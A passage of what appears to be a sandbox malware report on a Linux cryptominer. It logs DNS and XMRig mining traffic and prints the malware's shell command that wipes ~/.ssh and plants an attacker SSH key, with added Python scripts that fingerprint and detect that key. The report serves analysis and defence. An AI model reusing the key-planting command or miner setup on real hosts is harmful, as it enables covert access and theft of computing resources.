DT_RELACOUNT | value | 3632 | 0x6ffffff9
DT_NULL | value | 0x0 | 0x0

Symbols

Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx
 | | | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF

            Network Behavior

            Network Port Distribution

            TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2020 02:55:24.797347069 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:55:24.825766087 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:55:24.825931072 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:55:24.826159000 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:55:24.851353884 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:55:24.941581964 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:55:24.941786051 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:55:33.038753986 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:55:33.038959026 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:55:48.821613073 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:55:48.821717978 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:56:48.871293068 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:56:48.896306992 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:56:49.451385975 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:56:49.476771116 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:56:49.476799965 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:56:49.476937056 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:57:49.971415997 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:57:50.008258104 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:57:50.008428097 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:58:29.038871050 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:58:29.038991928 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:59:29.191299915 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:59:29.216207027 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:59:29.792668104 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125
Jan 20, 2020 02:59:29.844615936 CET | 80 | 45164 | 45.9.148.125 | 192.168.2.20
Jan 20, 2020 02:59:29.844810009 CET | 45164 | 80 | 192.168.2.20 | 45.9.148.125

            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2020 02:55:24.767127991 CET | 50550 | 53 | 192.168.2.20 | 8.8.8.8
Jan 20, 2020 02:55:24.771472931 CET | 50550 | 53 | 192.168.2.20 | 8.8.4.4
Jan 20, 2020 02:55:24.771579027 CET | 50550 | 53 | 192.168.2.20 | 8.8.8.8
Jan 20, 2020 02:55:24.771637917 CET | 50550 | 53 | 192.168.2.20 | 8.8.4.4
Jan 20, 2020 02:55:24.792550087 CET | 53 | 50550 | 8.8.8.8 | 192.168.2.20
Jan 20, 2020 02:55:24.796895027 CET | 53 | 50550 | 8.8.4.4 | 192.168.2.20
Jan 20, 2020 02:55:24.796922922 CET | 53 | 50550 | 8.8.4.4 | 192.168.2.20
Jan 20, 2020 02:55:24.796940088 CET | 53 | 50550 | 8.8.8.8 | 192.168.2.20
Jan 20, 2020 02:55:37.752165079 CET | 34144 | 53 | 192.168.2.20 | 8.8.8.8
Jan 20, 2020 02:55:37.752350092 CET | 44250 | 53 | 192.168.2.20 | 8.8.8.8
Jan 20, 2020 02:55:37.777545929 CET | 53 | 34144 | 8.8.8.8 | 192.168.2.20
Jan 20, 2020 02:55:37.777673006 CET | 53 | 44250 | 8.8.8.8 | 192.168.2.20

            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 20, 2020 02:55:24.767127991 CET | 192.168.2.20 | 8.8.8.8 | 0xe437 | Standard query (0) | debian-package.center | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.771472931 CET | 192.168.2.20 | 8.8.4.4 | 0xe437 | Standard query (0) | debian-package.center | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.771579027 CET | 192.168.2.20 | 8.8.8.8 | 0xe558 | Standard query (0) | debian-package.center | 28 (AAAA, IPv6 address) | IN (0x0001)
Jan 20, 2020 02:55:24.771637917 CET | 192.168.2.20 | 8.8.4.4 | 0xe558 | Standard query (0) | debian-package.center | 28 (AAAA, IPv6 address) | IN (0x0001)

            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 20, 2020 02:55:24.792550087 CET | 8.8.8.8 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | (none) | 45.9.148.117 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.792550087 CET | 8.8.8.8 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | (none) | 45.9.148.129 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.792550087 CET | 8.8.8.8 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | (none) | 45.9.148.125 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.796895027 CET | 8.8.4.4 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | (none) | 45.9.148.117 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.796895027 CET | 8.8.4.4 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | (none) | 45.9.148.129 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.796895027 CET | 8.8.4.4 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | (none) | 45.9.148.125 | A (IP address) | IN (0x0001)

            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.20 | 45164 | 45.9.148.125 | 80

The sandbox files this session under HTTP only because the pool listens on TCP/80: no HTTP request line or header appears in the payloads. The exchange is the Stratum mining protocol carried as JSON-RPC (login, job, keepalived), and the login message carries the XMRig/5.5.0 agent string and the Monero payout address the miner works for.

Timestamp | kBytes transferred | Direction | Data
Jan 20, 2020 02:55:24.826159000 CET | 1 | OUT | Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 35 42 4c 41 76 4c 4e 61 79 65 66 71 4e 61 64 33 74 47 70 48 4b
Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ","pass":"x","agent":"XMRig/5.5.0 (Linux x86_64) libuv/1.34.0 gcc/8.3.0","algo":["cn/1",
Jan 20, 2020 02:55:24.941581964 CET | 2 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 31 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39 64 61 33 2d 65 62 32 63 61
Data Ascii: {"jsonrpc":"2.0","id":1,"error":null,"result":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59","job":{"blob":"0c0ce88e94f1051f116f4f8199258f404bfb08750d7ee00ea8b1233dcce50550aafaccc4c9505f00000029d0febf7e3a38cbc6167412e730c2aa8de694cc8669219b3176d
Jan 20, 2020 02:55:33.038753986 CET | 2 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 63 30 63 39 34 39 31 39 34 66 31 30 35 31 66 31 31 36 66 34 66 38 31 39 39 32 35 38 66 34 30
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0c0c949194f1051f116f4f8199258f404bfb08750d7ee00ea8b1233dcce50550aafaccc4c9505f000000296e6f49b008f8396d2f5eacf0c0fae7eadd509d0571e9f0bd03ea162c13f4044a12","job_id":"658855215858069","target":"37
Jan 20, 2020 02:55:48.821613073 CET | 555 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 63 30 63 61 32 39 31 39 34 66 31 30 35 62 36 39 65 34 35 63 33 66 39 30 62 61 66 66 65 30 33
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0c0ca29194f105b69e45c3f90baffe0374bef30da82f1f5f11ac2c795752ecf4ac3943afb29d6b00000029506e9251241a22f42933f5a23c61f54f09bd89e7c568a31ba1c72c9679c86b4b12","job_id":"440049441842439","target":"37
Jan 20, 2020 02:56:49.451385975 CET | 556 | OUT | Data Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39
Data Ascii: {"id":2,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}
Jan 20, 2020 02:56:49.476799965 CET | 556 | IN | Data Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
Jan 20, 2020 02:57:49.971415997 CET | 557 | OUT | Data Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39
Data Ascii: {"id":3,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}
Jan 20, 2020 02:57:50.008258104 CET | 557 | IN | Data Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
Data Ascii: {"id":3,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
Jan 20, 2020 02:58:29.038871050 CET | 557 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 63 30 63 63 34 39 32 39 34 66 31 30 35 62 65 66 31 35 39 30 66 30 33 62 35 35 65 30 36 38 35
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0c0cc49294f105bef1590f03b55e06852ebf32b66c4e3a625d4156d807b52f55097c24260c4b2600000029988278e1740d00927953c6617b04f1083f6e6b025140762bcecc4e2be199c44603","job_id":"937501214398362","target":"37
Jan 20, 2020 02:59:29.792668104 CET | 558 | OUT | Data Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39
Data Ascii: {"id":4,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}
Jan 20, 2020 02:59:29.844615936 CET | 558 | IN | Data Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
Data Ascii: {"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
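An added example, not part of the Joe Sandbox report, that works through the session above the way a triager would: it recovers the facts that matter (payout wallet, miner agent, pool-assigned client id, job ids) from the captured ASCII lines even where the report cut them off, checks that the wallet has the shape of a standard Monero address, and tells Stratum from genuine HTTP by the opening bytes. CAPTURED is transcribed from the table; the field names are the ones visible in the messages, and the function names are mine.

```python
import json
import re

# Transcribed from the HTTP Packets table of this report: direction and ASCII
# payload of every message on 192.168.2.20:45164 <-> 45.9.148.125:80. Messages
# the report cut off are kept exactly as truncated.
CAPTURED = [
    ("OUT", '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ","pass":"x","agent":"XMRig/5.5.0 (Linux x86_64) libuv/1.34.0 gcc/8.3.0","algo":["cn/1",'),
    ("IN", '{"jsonrpc":"2.0","id":1,"error":null,"result":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59","job":{"blob":"0c0ce88e94f1051f116f4f8199258f404bfb08750d7ee00ea8b1233dcce50550aafaccc4c9505f00000029d0febf7e3a38cbc6167412e730c2aa8de694cc8669219b3176d'),
    ("IN", '{"jsonrpc":"2.0","method":"job","params":{"blob":"0c0c949194f1051f116f4f8199258f404bfb08750d7ee00ea8b1233dcce50550aafaccc4c9505f000000296e6f49b008f8396d2f5eacf0c0fae7eadd509d0571e9f0bd03ea162c13f4044a12","job_id":"658855215858069","target":"37'),
    ("IN", '{"jsonrpc":"2.0","method":"job","params":{"blob":"0c0ca29194f105b69e45c3f90baffe0374bef30da82f1f5f11ac2c795752ecf4ac3943afb29d6b00000029506e9251241a22f42933f5a23c61f54f09bd89e7c568a31ba1c72c9679c86b4b12","job_id":"440049441842439","target":"37'),
    ("OUT", '{"id":2,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}'),
    ("IN", '{"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}'),
    ("OUT", '{"id":3,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}'),
    ("IN", '{"id":3,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}'),
    ("IN", '{"jsonrpc":"2.0","method":"job","params":{"blob":"0c0cc49294f105bef1590f03b55e06852ebf32b66c4e3a625d4156d807b52f55097c24260c4b2600000029988278e1740d00927953c6617b04f1083f6e6b025140762bcecc4e2be199c44603","job_id":"937501214398362","target":"37'),
    ("OUT", '{"id":4,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}'),
    ("IN", '{"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}'),
]

# A standard Monero address is 95 base58 characters and starts with 4.
MONERO_STANDARD_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")


def parse_stratum_line(text):
    """Parse one captured message. Complete messages come back as the JSON
    object; messages the capture cut off fall back to regex extraction of the
    fields that matter for triage and are flagged as truncated."""
    try:
        return json.loads(text), False
    except json.JSONDecodeError:
        pass
    msg, params = {}, {}
    m = re.search(r'"method"\s*:\s*"([^"]+)"', text)
    if m:
        msg["method"] = m.group(1)
    for key in ("login", "pass", "agent", "job_id", "target"):
        m = re.search(r'"%s"\s*:\s*"([^"]*)"' % key, text)
        if m:
            params[key] = m.group(1)
    if params:
        msg["params"] = params
    m = re.search(r'"result"\s*:\s*\{\s*"id"\s*:\s*"([^"]+)"', text)
    if m:
        msg["result"] = {"id": m.group(1)}
    return msg, True


def summarize_session(captured):
    """Collect the indicators from a (direction, payload) list."""
    s = {"methods": set(), "wallet": None, "agent": None, "client_id": None,
         "keepalive_ids": set(), "job_ids": [], "truncated": 0}
    for direction, text in captured:
        msg, truncated = parse_stratum_line(text)
        s["truncated"] += truncated
        method = msg.get("method")
        params = msg.get("params") or {}
        result = msg.get("result") or {}
        if method:
            s["methods"].add(method)
        if method == "login" and direction == "OUT":
            s["wallet"], s["agent"] = params.get("login"), params.get("agent")
        elif method == "job" and "job_id" in params:
            s["job_ids"].append(params["job_id"])
        elif method == "keepalived" and "id" in params:
            s["keepalive_ids"].add(params["id"])
        if direction == "IN" and isinstance(result, dict) and "id" in result:
            s["client_id"] = result["id"]  # session id the pool handed out at login
    s["wallet_is_standard_monero"] = bool(s["wallet"] and MONERO_STANDARD_ADDR.match(s["wallet"]))
    return s


def classify_port80_payload(first_message):
    """Port 80 does not make it HTTP. An HTTP request opens with a method token
    and closes its request line with HTTP/1.x; a Stratum client opens with a
    JSON-RPC object. Returns 'http', 'stratum-jsonrpc' or 'unknown'."""
    head = first_message.lstrip()
    if re.match(r"^(GET|POST|PUT|HEAD|OPTIONS|DELETE|CONNECT) \S+ HTTP/1\.[01]\r?\n", head):
        return "http"
    if head.startswith("{") and '"jsonrpc"' in head and '"method"' in head:
        return "stratum-jsonrpc"
    return "unknown"


if __name__ == "__main__":
    print(classify_port80_payload(CAPTURED[0][1]))
    for key, val in summarize_session(CAPTURED).items():
        print("%-26s %s" % (key, val))
```

The wallet string and the agent string are the two durable indicators here: the pool host changes per campaign, but the payout address is what the operator is paid to, and the agent string is what XMRig sends unless the build was patched. The keepalived id matching the login reply's result.id is how you tie later packets in a larger capture back to the same mining session.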


            System Behavior

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /tmp/cron
Arguments: /tmp/cron
File size: 2401096 bytes
MD5 hash: 84945e9ea1950be3e870b798bd7c7559

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /tmp/cron
Arguments: n/a
File size: 2401096 bytes
MD5 hash: 84945e9ea1950be3e870b798bd7c7559

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: n/a
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/rm
Arguments: rm -rf .ssh
File size: 60272 bytes
MD5 hash: b79876063d894c449856cca508ecca7f

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: n/a
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/mkdir
Arguments: mkdir .ssh
File size: 76848 bytes
MD5 hash: a97f666f21c85ec62ea47d022263ef41

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: n/a
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/chmod
Arguments: chmod -R go= /home/user/.ssh
File size: 56112 bytes
MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /tmp/cron
Arguments: n/a
File size: 2401096 bytes
MD5 hash: 84945e9ea1950be3e870b798bd7c7559
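The sh, rm, mkdir and chmod entries above are one action: SSH-key persistence. The user's .ssh directory is wiped, a single attacker key (comment mdrfckr) becomes the only authorized key, and the directory is locked to the owner so nothing else can read or replace it. The Python below is an added example, not part of the Joe Sandbox report: it pulls the key out of the logged command line, computes the SHA256 fingerprint the way ssh-keygen -lf does, decodes the RSA blob header, scores a command line for this persistence pattern, and scans an authorized_keys file for the key. COMMAND is the report's sh -c argument with the \" escapes resolved to the quotes the shell saw; the benign Ed25519 entry in the sample authorized_keys is constructed here, and the function and variable names are mine.

```python
import base64
import hashlib
import re
import struct
from collections import namedtuple

# The sh -c command line logged above, with the sandbox's \" escapes resolved.
COMMAND = (
    'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa '
    'AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2'
    '/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8'
    'hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd'
    '4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== '
    'mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~'
)

Key = namedtuple("Key", "keytype blob comment")
KEY_RE = re.compile(
    r'(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/]+={0,2})(?:\s+([^\s"\'>]+))?')


def extract_keys(text):
    """Every public-key literal in a command line or authorized_keys text."""
    return [Key(m.group(1), m.group(2), m.group(3) or "") for m in KEY_RE.finditer(text)]


def fingerprint(blob_b64):
    """SHA256 fingerprint in the form ssh-keygen -lf prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def _field(blob, off):
    """Read one length-prefixed field of an SSH wire-format blob."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    end = off + 4 + n
    if end > len(blob):
        raise ValueError("field runs past the end of the blob")
    return blob[off + 4:end], end


def rsa_header(blob_b64):
    """Decode the type string and public exponent of an ssh-rsa blob and report
    whether the modulus it declares is actually all there (a key pasted through
    several reports can lose characters)."""
    blob = base64.b64decode(blob_b64)
    keytype, off = _field(blob, 0)
    if keytype != b"ssh-rsa":
        return {"keytype": keytype.decode(), "e": None, "modulus_complete": None}
    e_bytes, off = _field(blob, off)
    (declared,) = struct.unpack(">I", blob[off:off + 4])
    return {"keytype": "ssh-rsa", "e": int.from_bytes(e_bytes, "big"),
            "modulus_complete": len(blob) - off - 4 == declared}


def backdoor_indicators(cmd):
    """Reasons a shell command line looks like SSH-key persistence, in order."""
    reasons = []
    if re.search(r"rm\s+-\w*r\w*\s+\S*\.ssh\b", cmd):
        reasons.append("wipes .ssh")
    if KEY_RE.search(cmd) and re.search(r">>?\s*\S*authorized_keys", cmd):
        reasons.append("writes a literal key into authorized_keys")
    if re.search(r"chmod\s+-R\s+go=\s+\S*\.ssh", cmd):
        reasons.append("locks .ssh permissions afterwards")
    return reasons


def scan_authorized_keys(text, bad_fingerprints, bad_comments=frozenset({"mdrfckr"})):
    """1-based line numbers of authorized_keys entries matching known backdoor keys."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for key in extract_keys(line):
            if fingerprint(key.blob) in bad_fingerprints or key.comment in bad_comments:
                hits.append(lineno)
                break
    return hits


# Constructed sample authorized_keys: a benign Ed25519 entry whose blob is built
# here, followed by the line the command above appends.
BENIGN_BLOB = base64.b64encode(
    b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32))).decode()
BACKDOOR = extract_keys(COMMAND)[0]
SAMPLE_AUTHORIZED_KEYS = "ssh-ed25519 %s alice@laptop\n%s %s %s\n" % (
    BENIGN_BLOB, BACKDOOR.keytype, BACKDOOR.blob, BACKDOOR.comment)

if __name__ == "__main__":
    print(fingerprint(BACKDOOR.blob), rsa_header(BACKDOOR.blob))
    print(backdoor_indicators(COMMAND))
    print(scan_authorized_keys(SAMPLE_AUTHORIZED_KEYS, {fingerprint(BACKDOOR.blob)}))
```

Two points worth keeping when you reuse this. The public exponent decodes to 37 (0x25), which is PuTTYgen's default rather than OpenSSH's 65537, so the key was in all likelihood generated with PuTTY; that is a second, independent way to recognise it even if the comment is stripped. And rsa_header reports whether the base64 really contains the modulus length it declares, because a damaged blob still produces a fingerprint, just one that will never match the key actually sitting on a compromised host; hunt on the comment and on the exponent as well as on the fingerprint.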